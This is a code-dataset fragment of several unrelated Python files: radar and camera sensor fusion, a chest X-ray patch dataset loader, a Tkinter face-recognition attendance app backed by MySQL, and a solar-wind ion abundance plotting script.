s, d in zip(self.radar_sensors, radar_data):\n s.update(d)\n for s, d in zip(self.image_sensors, image_data):\n s.update(d)\n\n def observe(self) -> ObsBundle:\n '''\n zs_2 = self.pair_1.observe()\n zs_3 = self.pair_2.observe()\n zs = zs_2 + zs_3\n return zs\n '''\n zs_2 = self.radar_sensors[0].observe()\n zs_3 = self.radar_sensors[1].observe()\n zs = zs_2 + zs_3\n return zs\n\n\nclass SensorPair:\n\n def __init__(self, radar_sensor: RadarSensor, image_sensor: ImageSensor, iou_threshold: float) -> None:\n self.radar = radar_sensor\n self.image = image_sensor\n self.fused_sensor = FusedSensor([radar_sensor, image_sensor], [1.0, 0.0])\n self.iou_threshold = iou_threshold\n\n def update(self, radar_data: np.ndarray, image_data: np.ndarray) -> None:\n self.radar.update(radar_data)\n self.image.update(image_data)\n\n def observe(self) -> ObsBundle:\n radar_pois = radar_poi(self.radar.obs2world(), self.image.w2c, self.image.c2p, self.image.target_height)\n image_rois = self.image.boxes[0:4]\n # IOU matching\n radar_expanded_rois = np.array(list(\n map(lambda p, d: expand_poi(p, d, self.image.width, self.image.height), radar_pois, self.radar.zs[:, 0])),\n dtype=int)\n fused_rad_idx, fused_cam_idx = optimize_iou(radar_expanded_rois, image_rois, self.iou_threshold)\n # get observation bundle\n fused_zs = np.concatenate([self.radar.zs[fused_rad_idx, 0:3], self.image.zs[fused_cam_idx, 0:2]], axis=1)\n self.fused_sensor.update(fused_zs)\n self.radar.obs_filter(fused_rad_idx)\n self.image.obs_filter(fused_cam_idx)\n # TODO: improve code\n zs, ss = [], []\n ps = np.concatenate([self.fused_sensor.obs2world(), self.radar.obs2world(), self.image.obs2world()], axis=0)\n for s in [self.fused_sensor, self.radar, self.image]:\n for z in s.zs:\n zs.append(z)\n ss.append(s)\n return ObsBundle(zs, ps, ss)\n","sub_path":"src/site_model/src/utils/sensor_and_obs.py","file_name":"sensor_and_obs.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556144528","text":"\n\nimport torch\nimport torch.utils.data\nfrom imgaug import augmenters as iaa\nimport random\nimport numpy as np\nimport cv2\nimport pydicom\nfrom scipy.sparse import csc_matrix, save_npz, load_npz\nimport scipy\n\n \nclass PneumoniaDataset(torch.utils.data.Dataset):\n def __init__(self,df, dims=1024, patchSz=256, miniBatch=1, \n train=True,val=False,transform=False):\n \"\"\"\n Args:\n text_file(string): path to text file\n root_dir(string): directory with all train images\n \"\"\"\n self.train = train\n self.val = val\n self.df = df\n self.transform = transform\n self.dims = dims\n self.patchSz = patchSz\n self.sz = miniBatch \n\n \n def cropPad(self,imgs, lbls):\n augmenters_imgs = [\n iaa.CropAndPad(percent=(-0.5, 0.2)\n )] \n \n seq_imgs = iaa.Sequential(augmenters_imgs, random_order=False) \n seq_imgs_deterministic = seq_imgs.to_deterministic()\n\n imgs_aug = seq_imgs_deterministic.augment_images(imgs)\n masks_aug = seq_imgs_deterministic.augment_images(lbls)\n return imgs_aug, masks_aug\n\n def affine(self,imgs, lbls):\n augmenters_imgs = [\n iaa.Affine(scale=(.7,1)\n )] \n \n seq_imgs = iaa.Sequential(augmenters_imgs, random_order=False) \n seq_imgs_deterministic = seq_imgs.to_deterministic()\n\n imgs_aug = seq_imgs_deterministic.augment_images(imgs)\n masks_aug = seq_imgs_deterministic.augment_images(lbls)\n return imgs_aug, masks_aug\n \n \n # def resize(self, idx): \n # img = pydicom.dcmread(self.df.iloc[idx]['file_path']).pixel_array\n # img = scipy.misc.imresize(img, (self.dims,self.dims))\n\n # if self.train:\n # if self.df.iloc[idx]['has_pneumothorax']:\n # mk = load_npz('siim/mask/'+self.df.iloc[idx]['id']+'.npz').todense().astype('uint8')\n # mk[mk>0]=1\n # mk = scipy.misc.imresize(mk,(self.dims,self.dims)).astype('uint8')\n # return img/255, mk\n # else:\n # mk = np.zeros((self.dims, self.dims), dtype=np.uint8)\n # return img/255, mk\n # else:\n # return img/255\n \n def getImage(self, idx):\n img = pydicom.dcmread(self.df.iloc[idx]['file_path']).pixel_array \n if self.train:\n if self.df.iloc[idx]['has_pneumothorax']:\n mk = load_npz('siim/mask/'+self.df.iloc[idx]['id']+'.npz').todense().astype('uint8')\n mk[mk>0]=1\n return img/255, mk\n else:\n mk = np.zeros((self.dims, self.dims), dtype=np.uint8)\n return img/255, mk\n else:\n return img/255\n\n def sample(self):\n #the dataset was split where the first 1903 samples are pos and the rest are neg\n pos = 1903\n neg = 1904\n randy = random.randint(0,4)\n if randy==4:\n return random.randint(neg, len(self.df)-1)\n else: return random.randint(0,pos)\n\n def transform_(self, image, mask):\n# print('transform') \n randy = random.randint(0,2)\n \n if randy == 0:\n pass #nothing, just a normal image\n \n #flip left to right only\n if randy == 1:\n image = np.fliplr(image).copy()\n mask = np.fliplr(mask).copy()\n\n #flip up or down only\n if randy ==2:\n image = np.flipud(image).copy()\n mask = np.flipud(mask).copy() \n \n#\n #need to reshape here before using iaa augs\n image = np.expand_dims(image, axis=0)\n mask = np.expand_dims(mask, axis=0)\n# https://imgaug.readthedocs.io/en/latest/source/augmenters.html\n \n if self.transform:\n randy = random.randint(0,3)\n if randy ==0:\n aug = iaa.GaussianBlur(sigma=(1.0,2.0))\n image = aug.augment_images(image)\n \n if randy == 1:\n image, mask = self.affine(image, mask)\n \n else:\n pass \n \n return image, mask\n\n\n def getPatches(self, img, mk):\n sz = self.sz\n if img.ndim==3:\n img = img.squeeze()\n mk = mk.squeeze()\n\n X_train = np.zeros((sz, self.patchSz, self.patchSz), dtype=np.float32)\n Y_train = np.zeros((sz, self.patchSz, self.patchSz), dtype=np.uint8)\n \n half = self.patchSz//2\n list_pos = np.argwhere(mk>0)\n if len(list_pos)>0:\n \n for i in range(sz):\n randy = np.random.randint(list_pos.shape[0])\n x,y = list_pos[randy]\n if x (self.dims-half): x=self.dims-half\n if y >(self.dims-half): y=self.dims-half \n \n # print(x-half, x+half, y-half, y+half)\n X_train[i] = img[x-half:x+half,y-half:y+half]\n Y_train[i] = mk[x-half:x+half,y-half:y+half]\n else:\n for i in range(sz): \n x= np.random.randint(half,1024-half)\n y= np.random.randint(half,1024-half) \n X_train[i] = img[x-half:x+half,y-half:y+half] \n\n return X_train, Y_train\n\n\n def __len__(self):\n if len(self.df) > 3000:\n return 4000\n return len(self.df)\n\n def __getitem__(self, idx):\n # print('idx:',idx)\n if self.train:\n \n if self.val:\n # print('idx',idx)\n img, mk = self.getImage(idx)\n img, mk = self.getPatches(img, mk)\n img = np.expand_dims(img, axis=1)\n mk = np.expand_dims(mk, axis=1)\n return img, mk\n \n # print('about to sample')\n #get an index \n idx = self.sample()\n #get image\n img, mk = self.getImage(idx)\n #get augmentations\n img, mk = self.transform_(img, mk)\n #break into patches\n img, mk = self.getPatches(img, mk)\n img = np.expand_dims(img, axis=1)\n mk = np.expand_dims(mk, axis=1)\n \n for i in range(img.shape[0]): # should be size of miniBatch\n randy = random.randint(0,99)\n if randy >70:\n img[i], mk[i] = self.cropPad(img[i], mk[i])\n \n\n return img, mk\n \n # print('made it outside')\n # img = self.resize(idx)\n # img = img.reshape(1,self.dims, self.dims)\n # return img\n print('Should not be here, use the test dataset')\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass PneumoniaDataset_test(torch.utils.data.Dataset):\n def __init__(self,df, dims=256):\n \"\"\"\n Args:\n text_file(string): path to text file\n root_dir(string): directory with all train images\n \"\"\"\n \n self.df = df\n self.dims = dims \n \n def getPatch(self,img_id):\n mod = 256\n count=0\n X_test = np.zeros((256, self.dims, self.dims), dtype=np.float32)\n \n img = pydicom.dcmread(self.df.iloc[img_id]['file_path']).pixel_array\n topBorderWidth = mod\n bottomBorderWidth = mod\n leftBorderWidth = mod\n rightBorderWidth= mod\n\n img = cv2.copyMakeBorder(\n img, \n topBorderWidth, \n bottomBorderWidth, \n leftBorderWidth, \n rightBorderWidth, \n cv2.BORDER_REFLECT \n )\n \n# image(img)\n\n for i in range(256, 1280,64):\n for j in range( 256,1280,64): \n # print(i,j)\n X_test[count] = img[i-128:i+128, j-128:j+128]\n count+=1\n \n# print('dataset size: ', count)\n X_test /=255\n# t=rebuild_(X_test)\n# image(t)\n return X_test\n \n \n \n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n #should return 256 patches\n images = self.getPatch(idx)\n \n return images\n ","sub_path":"utils/pneumonia_patches.py","file_name":"pneumonia_patches.py","file_ext":"py","file_size_in_byte":8479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69820096","text":"from tkinter import*\r\nfrom tkinter import ttk\r\nimport tkinter\r\nfrom PIL import Image,ImageTk\r\nfrom time import strftime\r\nfrom datetime import datetime\r\nimport os\r\nimport cv2\r\nimport mysql.connector\r\nfrom tkinter import messagebox\r\nfrom students import Students\r\nfrom train import Train\r\nfrom face_recognizer import Face_recognizer\r\nfrom attendance import Attendance\r\nfrom chatbot import Chatbot\r\n\r\nclass Face_Recognition_System_student:\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.geometry(\"1365x755+0+0\")\r\n self.root.title(\"Face Recognition System\")\r\n\r\n # Image 1\r\n img=Image.open(r\"college_images\\facialrecognition.png\")\r\n img=img.resize((455,130),Image.ANTIALIAS)\r\n self.photoimg=ImageTk.PhotoImage(img)\r\n\r\n f_lbl=Label(self.root,image=self.photoimg)\r\n f_lbl.place(x=0,y=0,width=455,height=130)\r\n\r\n #image2\r\n img1=Image.open(r\"college_images\\images.jpg\")\r\n img1=img1.resize((455,130),Image.ANTIALIAS)\r\n self.photoimg1=ImageTk.PhotoImage(img1)\r\n\r\n f_lbl=Label(self.root,image=self.photoimg1)\r\n f_lbl.place(x=455,y=0,width=455,height=130)\r\n\r\n #image3\r\n img2=Image.open(r\"college_images\\dev.jpg\")\r\n img2=img2.resize((457,130),Image.ANTIALIAS)\r\n self.photoimg2=ImageTk.PhotoImage(img2)\r\n\r\n f_lbl=Label(self.root,image=self.photoimg2)\r\n f_lbl.place(x=910,y=0,width=457,height=130)\r\n\r\n #Background Image\r\n img3=Image.open(r\"college_images\\BestFacialRecognition.jpg\")\r\n img3=img3.resize((1365,625),Image.ANTIALIAS)\r\n self.photoimg3=ImageTk.PhotoImage(img3)\r\n\r\n bg_img=Label(self.root,image=self.photoimg3)\r\n bg_img.place(x=0,y=130,width=1365,height=625)\r\n\r\n #Title\r\n title_lbl=Label(bg_img, text=\"FACE RECOGNITION ATTENDANCE SYSTEM SOFTWARE\", font=(\"times new roman\",28,\"bold\"),bg=\"white\",fg=\"red\")\r\n title_lbl.place(x=0,y=0,width=1365,height=45)\r\n\r\n #Time\r\n def time():\r\n string=strftime(\"%H:%M:%S %p\")\r\n lbl.config(text = string)\r\n lbl.after(1000, time)\r\n \r\n lbl=Label(title_lbl,font=(\"times new roman\",14),bg=\"white\",fg=\"blue\")\r\n lbl.place(x=5,y=0,width=120,height=50)\r\n time()\r\n\r\n # #Students button\r\n # img4=Image.open(r\"college_images\\student.jpg\")\r\n # img4=img4.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg4=ImageTk.PhotoImage(img4)\r\n\r\n # b1=Button(bg_img,image=self.photoimg4,command=self.student_detail,cursor=\"hand2\")\r\n # b1.place(x=200,y=100,width=180, height=180)\r\n\r\n # b1_1=Button(bg_img,text=\"Student Details\",command=self.student_detail,cursor=\"hand2\",font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b1_1.place(x=200,y=280,width=180,height=30)\r\n\r\n #Detect face button\r\n img5=Image.open(r\"college_images\\face_detector1.jpg\")\r\n img5=img5.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg5=ImageTk.PhotoImage(img5)\r\n\r\n b2=Button(bg_img,image=self.photoimg5,cursor=\"hand2\",command=self.face_recog)\r\n b2.place(x=200,y=100,width=180, height=180)\r\n\r\n b2_2=Button(bg_img,text=\"Face Detector\",cursor=\"hand2\",command=self.face_recog,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b2_2.place(x=200,y=280,width=180,height=30)\r\n\r\n\r\n #Attendance face button\r\n img6=Image.open(r\"college_images\\girl.jpeg\")\r\n img6=img6.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg6=ImageTk.PhotoImage(img6)\r\n\r\n b3=Button(bg_img,image=self.photoimg6,cursor=\"hand2\",command=self.attend)\r\n b3.place(x=450,y=100,width=180, height=180)\r\n\r\n b3_3=Button(bg_img,text=\"Attendance\",cursor=\"hand2\",command=self.attend,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b3_3.place(x=450,y=280,width=180,height=30)\r\n\r\n\r\n #Help button\r\n img7=Image.open(r\"college_images\\NyftyBot_small_512x512.webp\")\r\n img7=img7.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg7=ImageTk.PhotoImage(img7)\r\n\r\n b4=Button(bg_img,image=self.photoimg7,cursor=\"hand2\",command=self.chat_box)\r\n b4.place(x=700,y=100,width=180, height=180)\r\n\r\n b4_4=Button(bg_img,text=\"Help Desk\",cursor=\"hand2\",command=self.chat_box,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b4_4.place(x=700,y=280,width=180,height=30)\r\n\r\n # #Train Face button\r\n # img8=Image.open(r\"college_images\\images.jpg\")\r\n # img8=img8.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg8=ImageTk.PhotoImage(img8)\r\n\r\n # b5=Button(bg_img,image=self.photoimg8,cursor=\"hand2\",command=self.train_data)\r\n # b5.place(x=200,y=350,width=180, height=180)\r\n\r\n # b5_5=Button(bg_img,text=\"Train Data Model\",cursor=\"hand2\",command=self.train_data,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b5_5.place(x=200,y=530,width=180,height=30)\r\n\r\n # #Photos button\r\n # img9=Image.open(r\"college_images\\clg.jpg\")\r\n # img9=img9.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg9=ImageTk.PhotoImage(img9)\r\n\r\n # b6=Button(bg_img,image=self.photoimg9,cursor=\"hand2\",command=self.open_images)\r\n # b6.place(x=200,y=350,width=180, height=180)\r\n\r\n # b6_6=Button(bg_img,text=\"Photos\",cursor=\"hand2\",command=self.open_images,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b6_6.place(x=200,y=530,width=180,height=30)\r\n\r\n\r\n #Dev page button\r\n # img10=Image.open(r\"college_images\\dev.jpg\")\r\n # img10=img10.resize((180,180),Image.ANTIALIAS)\r\n # self.photoimg10=ImageTk.PhotoImage(img10)\r\n\r\n # b7=Button(bg_img,image=self.photoimg10,cursor=\"hand2\")\r\n # b7.place(x=950,y=100,width=180, height=180)\r\n\r\n # b7_7=Button(bg_img,text=\"Developers\",cursor=\"hand2\",font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n # b7_7.place(x=950,y=280,width=180,height=30)\r\n\r\n #Exit button\r\n img11=Image.open(r\"college_images\\exit.jpg\")\r\n img11=img11.resize((180,180),Image.ANTIALIAS)\r\n self.photoimg11=ImageTk.PhotoImage(img11)\r\n\r\n b8=Button(bg_img,image=self.photoimg11,cursor=\"hand2\",command=self.iexit)\r\n b8.place(x=200,y=350,width=180, height=180)\r\n\r\n b8_8=Button(bg_img,text=\"Exit\",cursor=\"hand2\",command=self.iexit,font=(\"times new roman\",14,\"bold\"),bg=\"darkblue\",fg=\"white\")\r\n b8_8.place(x=200,y=530,width=180,height=30)\r\n\r\n\r\n def mark_attendance(self,i,r,n,d):\r\n with open(\"attendance.csv\",\"r+\",newline=\"\\n\") as f:\r\n myDatalist=f.readlines()\r\n name_List=[]\r\n for line in myDatalist:\r\n entry=line.split((\",\"))\r\n name_List.append(entry[0])\r\n if ((i not in name_List) and (r not in name_List) and (n not in name_List) and (d not in name_List)):\r\n now=datetime.now()\r\n d1=now.strftime(\"%d/%m/%Y\")\r\n dtString=now.strftime(\"%H:%M:%S\")\r\n f.writelines(f\"\\n{i},{r},{n},{d},{dtString},{d1},Present\")\r\n\r\n \r\n\r\n\r\n\r\n #=================Face Recogniton===============\r\n def face_recog(self):\r\n def draw_boundary(img,classifier,ScaleFactor,minNeighbour,color,text,clf):\r\n gray_image=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n features=classifier.detectMultiScale(gray_image,ScaleFactor,minNeighbour)\r\n\r\n coord=[]\r\n\r\n for (x,y,w,h) in features:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\r\n id,predict=clf.predict(gray_image[y:y+h,x:x+w])\r\n confidence=int((100*(1-predict/300)))\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"\",database=\"face_recognition\")\r\n my_cursor=conn.cursor()\r\n\r\n my_cursor.execute(\"select name from students where st_id=\"+str(id))\r\n n=my_cursor.fetchone()\r\n n=\"+\".join(n)\r\n\r\n my_cursor.execute(\"select roll from students where st_id=\"+str(id))\r\n r=my_cursor.fetchone()\r\n r=\"+\".join(r)\r\n\r\n my_cursor.execute(\"select Dep from students where st_id=\"+str(id))\r\n d=my_cursor.fetchone()\r\n d=\"+\".join(d)\r\n\r\n my_cursor.execute(\"select st_id from students where st_id=\"+str(id))\r\n i=my_cursor.fetchone()\r\n i=\"+\".join(i)\r\n\r\n\r\n\r\n if confidence>77:\r\n cv2.putText(img,f\"Student's ID:{i}\",(x,y-80),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n cv2.putText(img,f\"Roll. No.:{r}\",(x,y-55),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n cv2.putText(img,f\"Name:{n}\",(x,y-30),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n cv2.putText(img,f\"Department:{d}\",(x,y-5),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,255,0),2)\r\n self.mark_attendance(i,r,n,d)\r\n else:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\r\n cv2.putText(img,\"Unknown Face\",(x,y-55),cv2.FONT_HERSHEY_COMPLEX,0.8,(0,0,255),2)\r\n\r\n coord=[x,y,w,h]\r\n return coord\r\n \r\n def recognize(img,clf,faceCascade):\r\n coord=draw_boundary(img,faceCascade,1.1,10,(255,255,255),\"Face\",clf)\r\n return img\r\n \r\n faceCascade=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n clf=cv2.face.LBPHFaceRecognizer_create()\r\n clf.read(\"classifier.xml\")\r\n\r\n\r\n video_cap=cv2.VideoCapture(0)\r\n\r\n while True:\r\n ret,img=video_cap.read()\r\n img=recognize(img,clf,faceCascade)\r\n cv2.imshow(\"Welcome to face recognizer\",img)\r\n\r\n if cv2.waitKey(1)==13:\r\n break\r\n video_cap.release()\r\n cv2.destroyAllWindows()\r\n\r\n #exit\r\n def iexit(self):\r\n self.iexit=tkinter.messagebox.askyesno(\"Exit\",\"Are you sure you want exit?\",parent=self.root)\r\n if self.iexit > 0:\r\n self.root.destroy()\r\n else:\r\n return\r\n\r\n #Open images\r\n def open_images(self):\r\n os.startfile(\"data\")\r\n\r\n\r\n #Function Buttons\r\n def student_detail(self):\r\n self.new_window=Toplevel(self.root)\r\n self.app=Students(self.new_window)\r\n\r\n # def train_data(self):\r\n # self.new_window=Toplevel(self.root)\r\n # self.app=Train(self.new_window)\r\n\r\n # def face_detect(self):\r\n # self.new_window=Toplevel(self.root)\r\n # self.app=Face_recognizer(self.new_window)\r\n\r\n def attend(self):\r\n self.new_window=Toplevel(self.root)\r\n self.app=Attendance(self.new_window)\r\n\r\n def chat_box(self):\r\n self.new_window=Toplevel(self.root)\r\n self.app=Chatbot(self.new_window)\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ ==\"__main__\":\r\n root=Tk()\r\n obj=Face_Recognition_System_student(root)\r\n root.mainloop()","sub_path":"student_main.py","file_name":"student_main.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49600224","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 12 10:56:03 2018\n\n@author: aa245567\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 13 20:48:25 2017\n\n@author: andy\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport plottingRoutines as pR\n\n\n\n#import all that stuff you need:\nfl_v = np.load('/Users/aa245567/Desktop/pythonstuff/hfl_v.npy')\nf_vdist = np.load('/Users/aa245567/Desktop/pythonstuff/hf_vdist.npy')\npath = '/Users/aa245567/Desktop/pythonstuff/'\nabundn = np.load(path + 'abund_struct.npy')\nregime = np.load(path + 'regime_struct.npy')\naswix1d = np.load(path + 'aswix_1d.npy')\n\n\n#plot the differential fluences for each regime,\n#\n\njvel = np.arange(200,1825,25) #Define jvel because it is convenient to do so here.\n'''\nfig, (pr_fl) = plt.subplots()\nline1 = pr_fl.plot(jvel,fl_v[:65,0,0],'r',label= \"CME\")\nline2 = pr_fl.plot(jvel,fl_v[:65,0,1],'b',label=\"CH\")\nline3 = pr_fl.plot(jvel,fl_v[:65,0,2],'g',label=\"IS\")\nline4 = pr_fl.plot(jvel,fl_v[:65,0,3],color='black',label=\"Bulk\")\npr_fl.set_ylabel(r\"Proton Fluence ${ cm^{-2}}$\",fontsize='large')\npr_fl.set_xlabel(r\"Proton Speed (${ km s^{-1}}$)\",fontsize='large')\npr_fl.legend(loc=\"upper right\")\n\n\n#plot the o7+/o6+ abundance ratios\n\nfor i in range(4):\n fig, (snax) = plt.subplots()\n aline1 = snax.plot(np.arange(200,1825,25),fl_v[0:65,0,i],'r',label = 'He')\n aline2 = snax.plot(np.arange(200,1825,25),fl_v[:65,1,i],'b-',label = 'C')\n aline3 = snax.plot(np.arange(200,1825,25),fl_v[:65,2,i],color='gold',label = '')\n aline4 = snax.plot(np.arange(200,1825,25),fl_v[:65,3,i],color='skyblue',label = 'N')\n aline5 = snax.plot(np.arange(200,1825,25),fl_v[:65,4,i],color='green',label='O')\n aline6 = snax.plot(np.arange(200,1825,25),fl_v[:65,5,i],color='purple',label='He')\n aline7 = snax.plot(np.arange(200,1825,25),fl_v[:65,6,i],color='lawngreen',label='Mg')\n aline8 = snax.plot(np.arange(200,1825,25),fl_v[:65,7,i],color='pink',label='S')\n snax.set_yscale('log')\n snax.set_ylabel('Normalized Fluence (arbitrary units)',fontsize='large')\n snax.set_xlabel(r'Solar Wind Proton Speed (km${ s^{ -1}}$)',fontsize = 'large')\n \n snax.legend()\n print fig \n ''' \n#Sorting routines and things.\n\n\n\n#assigns values to lists corresponding to speed bins before plotting.\ndlimit = 8\n\nhe2olow2, he2oupp2, he2omed2,hespeed2 = pR.geoHistWRanges(2,'he2o',dlimit,'Oxygen')\nc2olow2,c2oupp2,c2omed2,cspeed2=pR.geoHistWRanges(2,'c2o',dlimit,'Oxygen')\nn2olow2,n2oupp2,n2omed2,nspeed2=pR.geoHistWRanges(2,'n2o',dlimit,'Oxygen')\nne2olow2,ne2oupp2,ne2omed2,nespeed2=pR.geoHistWRanges(2,'ne2o',dlimit,'Oxygen')\nmg2olow2,mg2oupp2,mg2omed2,mgspeed2=pR.geoHistWRanges(2,'mg2o',dlimit,'Oxygen')\nsi2olow2,si2oupp2,si2omed2,sispeed2=pR.geoHistWRanges(2,'si2o',dlimit,'Oxygen')\ns2olow2,s2oupp2,s2omed2,sspeed2=pR.geoHistWRanges(2,'s2o',dlimit,'Oxygen')\nfe2olow2,fe2oupp2,fe2omed2,fespeed2=pR.geoHistWRanges(2,'fe2o',dlimit,'Oxygen')\no76low2, o76upp2, o76med2,o76speed2=pR.geoHistWRanges(2,'o76',dlimit,'Oxygen')\n\nhe2olow1, he2oupp1, he2omed1,hespeed1 = pR.geoHistWRanges(1,'he2o',dlimit,'Oxygen')\nc2olow1,c2oupp1,c2omed1,cspeed1=pR.geoHistWRanges(1,'c2o',dlimit,'Oxygen')\nn2olow1,n2oupp1,n2omed1,nspeed1=pR.geoHistWRanges(1,'n2o',dlimit,'Oxygen')\nne2olow1,ne2oupp1,ne2omed1,nespeed1=pR.geoHistWRanges(1,'ne2o',dlimit,'Oxygen')\nmg2olow1,mg2oupp1,mg2omed1,mgspeed1=pR.geoHistWRanges(1,'mg2o',dlimit,'Oxygen')\nsi2olow1,si2oupp1,si2omed1,sispeed1=pR.geoHistWRanges(1,'si2o',dlimit,'Oxygen')\ns2olow1,s2oupp1,s2omed1,sspeed1=pR.geoHistWRanges(1,'s2o',dlimit,'Oxygen')\nfe2olow1,fe2oupp1,fe2omed1,fespeed1=pR.geoHistWRanges(1,'fe2o',dlimit,'Oxygen')\no76low1, o76upp1, o76med1,o76speed1=pR.geoHistWRanges(1,'o76',dlimit,'Oxygen')\n\nhe2olow3, he2oupp3, he2omed3,hespeed3 = pR.geoHistWRanges(3,'he2o',dlimit,'Oxygen')\nc2olow3,c2oupp3,c2omed3,cspeed3=pR.geoHistWRanges(3,'c2o',dlimit,'Oxygen')\nn2olow3,n2oupp3,n2omed3,nspeed3=pR.geoHistWRanges(3,'n2o',dlimit,'Oxygen')\nne2olow3,ne2oupp3,ne2omed3,nespeed3=pR.geoHistWRanges(3,'ne2o',dlimit,'Oxygen')\nmg2olow3,mg2oupp3,mg2omed3,mgspeed3=pR.geoHistWRanges(3,'mg2o',dlimit,'Oxygen')\nsi2olow3,si2oupp3,si2omed3,sispeed3=pR.geoHistWRanges(3,'si2o',dlimit,'Oxygen')\ns2olow3,s2oupp3,s2omed3,sspeed3=pR.geoHistWRanges(3,'s2o',dlimit,'Oxygen')\nfe2olow3,fe2oupp3,fe2omed3,fespeed3=pR.geoHistWRanges(3,'fe2o',dlimit,'Oxygen')\no76low3,o76upp3,o76med3,o76speed3=pR.geoHistWRanges(3,'o76',dlimit,'Oxygen')\n\nhe2olow0, he2oupp0, he2omed0,hespeed0 = pR.geoHistWRanges(0,'he2o',dlimit,'Oxygen')\nc2olow0,c2oupp0,c2omed0,cspeed0=pR.geoHistWRanges(0,'c2o',dlimit,'Oxygen')\nn2olow0,n2oupp0,n2omed0,nspeed0=pR.geoHistWRanges(0,'n2o',dlimit,'Oxygen')\nne2olow0,ne2oupp0,ne2omed0,nespeed0=pR.geoHistWRanges(0,'ne2o',dlimit,'Oxygen')\nmg2olow0,mg2oupp0,mg2omed0,mgspeed0=pR.geoHistWRanges(0,'mg2o',dlimit,'Oxygen')\nsi2olow0,si2oupp0,si2omed0,sispeed0=pR.geoHistWRanges(0,'si2o',dlimit,'Oxygen')\ns2olow0,s2oupp0,s2omed0,sspeed0=pR.geoHistWRanges(0,'s2o',dlimit,'Oxygen')\nfe2olow0,fe2oupp0,fe2omed0,fespeed0=pR.geoHistWRanges(0,'fe2o',dlimit,'Oxygen')\no76low0,o76upp0,o76med0,o76speed0=pR.geoHistWRanges(0,'o76',dlimit,'Oxygen')\n\n#Plots abundance ratios and variances.\n\n#############********************##############\n'''\nnames = ['he2o','c2o','n2o','ne2o','mg2o','si2o','s2o','fe2o']\nspeeds = ['vhe','vc5','vn5','vne8','vmg10','vsi8','vs8','vfe10']\nylblparams = [[1,3,101],[-1,0.3,101],[-2,0,101],[-2,0,101],[-1.5,0,101],[-1.5,0.5,101],\n [-2,0.5,100], [-2,1,101]]\nreglbls = ['IS+CH','CME','CH','IS']\nflagNum = [0,1,2,3]\nymaxparams = [200,1,0.25,0.25,0.5,0.5,0.125,0.5]\nyminparams = [20,0.2,0.03,0.03,0.055,0.05,0.02,0.05]\nfor nm in range(len(names)):#len( names)):\n fig, axs = plt.subplots(2,2,figsize=(15,10))\n axes = np.ravel(axs)\n axind = 0\n for rel in reglbls:\n '''\n # if names[nm] == 'n2o' or names[nm] == 's2o':\n # x,y = findReg(rel,aswix1d[names[nm]],oneDay = 1)\n # x,y = goodBins(x,y)\n \n # else:\n'''\n x,y = pR.findReg(abundn[speeds[nm]],rel,abundn[names[nm]])\n x,y = pR.goodBins(x,y)\n \n xbins = np.linspace(0,851,75)\n ybins = np.logspace(ylblparams[nm][0],ylblparams[nm][1],ylblparams[nm][2])\n px,py = pR.geoMeanOfLog(5,x,y,speed = abundn[speeds[nm]])\n\n fit = np.polyfit(px,py,1,full=False,cov=True)\n slope = fit[0][0]\n intercept = fit[0][1]\n covariance = fit[1]\n bfline = 10**(slope * xbins + intercept)\n counts,_,_ = np.histogram2d(x,y,bins=(xbins,ybins))\n cl = axes[axind].pcolormesh(xbins,ybins,np.transpose(counts),cmap='jet')\n axes[axind].pcolormesh(xbins,ybins,np.transpose(counts),cmap = 'jet')\n axes[axind].set_ylim(ymin=yminparams[nm], ymax=ymaxparams[nm])\n axes[axind].set_title(rel,fontweight='bold')\n axes[axind].set_yscale('log')\n axes[axind].plot(xbins,bfline,'w-')\n axes[axind].text(0.01,0.01,'Slope = %f +/- %f'%(slope,np.sqrt(covariance[-1][-1]))\n ,verticalalignment='bottom',horizontalalignment='left',transform=axes[axind].transAxes,color='white')\n \n axind += 1\n \n fig.text(0.04,0.6,'%s Abundance Ratios'%names[nm].upper(),rotation='vertical',fontsize='large')\n fig.text(0.5,0,'Solar Wind Speed (km/s)',ha='center',va='center',fontsize='large')\n cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])\n fig.colorbar(cl,cax=cax)\n\n#################**************************########################\n\n\n#Abundance ratios with 10-90% variances.\n'''\n\nfig, 